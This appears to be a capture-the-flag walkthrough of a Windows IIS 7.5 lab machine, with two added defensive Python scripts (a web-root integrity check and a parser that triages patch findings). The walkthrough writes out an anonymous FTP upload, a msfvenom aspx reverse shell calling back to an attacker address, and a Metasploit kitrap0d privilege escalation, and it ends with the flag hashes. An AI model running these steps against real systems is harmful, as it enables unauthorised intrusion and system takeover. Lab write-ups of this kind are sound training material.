Service overview
The machine's IP address is 10.10.10.5. Let's look at the nmap output:
$ nmap -sV -sC -Pn -oN 10.10.10.5 10.10.10.5
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
FTP
From the nmap output we can see that anonymous (passwordless) FTP access is enabled and exposes the web server's files, while the web interface serves a stock IIS page. It looks like both point at the same directory.
Let's check whether we can upload a file:
$ echo test > test.txt
$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:user): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||49383|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************************| 6 49.23 KiB/s --:-- ETA
226 Transfer complete.
6 bytes sent in 00:00 (0.02 KiB/s)
ftp> exit
221 Goodbye.
Uploads are allowed and land in the same directory that the web server serves.
Let's prepare a reverse shell and launch it.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.93 LPORT=4242 -f aspx > shell.aspx
nc -lnvp 4242
Upload the file the same way as above and open http://10.10.10.5/shell.aspx.
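Added example (not part of the write-up): the defender's counterpart to the upload step. The root cause is a writable FTP root that is also the IIS site root, so a new server-side page appears in the web root the moment it is uploaded. A file-integrity snapshot of the web root catches exactly that: it records a baseline, diffs it later, and flags added or modified files with extensions the server would execute. The directory layout, file contents and the extension list are constructed for the demo; the `.aspx` file written in `demo()` contains placeholder text only.

```python
import hashlib
import os
import tempfile

# Extensions IIS hands to a script engine or executes. Assumption for this
# demo: anything with one of these appearing unexpectedly in the web root is
# worth an alert (web.config is included because edits to it change handlers).
SERVER_EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config",
                     ".exe", ".dll", ".php", ".cer", ".soap"}


def snapshot(root):
    """Map relative path -> sha256 for every regular file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            result[rel] = h.hexdigest()
    return result


def diff_snapshots(baseline, current):
    """Added, removed and content-changed paths between two snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def alerts(changes):
    """Changed files whose extension the web server would execute."""
    flagged = []
    for kind in ("added", "modified"):
        for path in changes[kind]:
            ext = os.path.splitext(path)[1].lower()
            if ext in SERVER_EXECUTABLE:
                flagged.append((kind, path))
    return flagged


def demo():
    """Constructed scenario: a default-looking IIS root, then two uploads."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "aspnet_client"))
        for name, content in (("iisstart.htm", b"<html>IIS7</html>"),
                              ("welcome.png", b"\x89PNG placeholder")):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(content)
        baseline = snapshot(root)

        # Later: a harmless text file and a server-side page appear via FTP.
        with open(os.path.join(root, "test.txt"), "wb") as fh:
            fh.write(b"test\n")
        with open(os.path.join(root, "shell.aspx"), "wb") as fh:
            fh.write(b"placeholder aspx content")  # not a working page

        changes = diff_snapshots(baseline, snapshot(root))
        return changes, alerts(changes)


if __name__ == "__main__":
    changes, flagged = demo()
    print("changes:", changes)
    print("alerts:", flagged)
```

In production the baseline would be persisted and the diff run on a schedule or from a file-system watcher; the fix that removes the need for the alert is to deny anonymous write on the FTP site (or point its root somewhere the web server never serves).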
Privilege escalation
Next I upgraded the shell to meterpreter and ran local_exploit_suggester, which produced the following candidates:
[*] 10.10.10.5 - Collecting local exploits for x86/windows…
[*] 10.10.10.5 - 186 exploit checks are being tried…
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.5 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
3 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
4 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
5 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
6 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
7 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
8 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated.
9 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
10 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
11 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
12 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
13 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
14 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
15 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
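Added example (not from the write-up): from the patching side, the suggester output above is a list of missing updates. This script parses the `[+]` lines, derives the bulletin or CVE reference from the module name (ms10_015_... becomes MS10-015, cve_2020_0787_... becomes CVE-2020-0787) and splits the results by the suggester's own confidence wording, so that validated findings can be prioritised and the "could not be validated" ones sent for a manual patch-level check. The input is the output shown above, embedded as a constructed string; the reference derivation is a naming-convention assumption about Metasploit module names.

```python
import re

# Constructed sample: the local_exploit_suggester lines from above.
SAMPLE_SUGGESTER = """\
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
"""

LINE_RE = re.compile(r"^\[\+\]\s+(\S+)\s+-\s+(exploit/\S+?):\s+(.*)$")
# Assumption: module names of the form msYY_NNN_* and cve_YYYY_NNNN_* encode
# the bulletin / CVE the module targets.
MS_RE = re.compile(r"^ms(\d{2})_(\d{3})_")
CVE_RE = re.compile(r"^cve_(\d{4})_(\d{4,})_")


def parse_suggester(text):
    """One dict per [+] line: host, module, derived reference, validated flag."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        host, module, verdict = m.groups()
        name = module.rsplit("/", 1)[1]
        ms, cve = MS_RE.match(name), CVE_RE.match(name)
        if ms:
            ref = f"MS{ms.group(1)}-{ms.group(2)}"
        elif cve:
            ref = f"CVE-{cve.group(1)}-{cve.group(2)}"
        else:
            ref = None
        rows.append({
            "host": host,
            "module": module,
            "reference": ref,
            # The suggester's "appears to be vulnerable" is its positive check;
            # "could not be validated" only means the service is present.
            "validated": verdict.startswith("The target appears to be vulnerable"),
        })
    return rows


def triage(rows):
    """Split by confidence and collect the distinct patch references."""
    confirmed = [r for r in rows if r["validated"]]
    unverified = [r for r in rows if not r["validated"]]
    refs = sorted({r["reference"] for r in rows if r["reference"]})
    return {"confirmed": confirmed, "unverified": unverified, "references": refs}


if __name__ == "__main__":
    t = triage(parse_suggester(SAMPLE_SUGGESTER))
    print(f"{len(t['confirmed'])} validated, {len(t['unverified'])} unverified")
    print("references to check against installed updates:", ", ".join(t["references"]))
```

Modules without a bulletin or CVE in their name (bypassuac_eventvwr, ntusermndragover, ppr_flatten_rec) come out with `reference` set to None and still need to be looked up by hand; the point of the split is that a host answering "appears to be vulnerable" to nine separate kernel and UAC checks is a host that has not seen updates for years, which is the finding to escalate.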
Let's use ms10_015_kitrap0d:
msf6 exploit(windows/local/ms10_015_kitrap0d) > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.93 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 2
session => 2
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost tun0
lhost => 10.10.16.93
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
User flag
C:\Users\babis\Desktop>type user.txt
536af083892e5ed2c7a952278d6dbe72
Root flag
C:\Users\Administrator\Desktop>type root.txt
3d15bf505edd2f431b35d688ab38385e